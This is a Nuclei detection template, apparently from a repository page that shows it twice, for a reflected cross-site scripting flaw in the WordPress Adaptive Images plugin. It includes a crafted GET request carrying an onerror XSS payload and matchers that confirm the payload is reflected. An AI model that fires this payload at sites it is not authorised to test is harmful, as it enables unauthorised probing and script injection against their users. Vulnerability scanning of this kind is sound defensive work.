nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml

id: wp-adaptive-xss

info:
  name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
  reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
  tags: tags

requests:
- raw:
  - |+
    GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
    Host: {{Hostname}}


  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - <img/src/onerror=alert("document.domain")>
  - type: status
    status:
    - 200
Create wp-adaptive-xss.yaml 2022-02-27 15:50:50 +00:00			`id: wp-adaptive-xss`

			`info:`
			`name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting`
			`author: dhiyaneshDK`
			`severity: medium`
			`description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue`
			`reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0`
			`tags: tags`

			`requests:`
			`- raw:`
			`- \|+`
			`GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1`
			`Host: {{Hostname}}`


			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- <img/src/onerror=alert("document.domain")>`
			`- type: status`
			`status:`
			`- 200`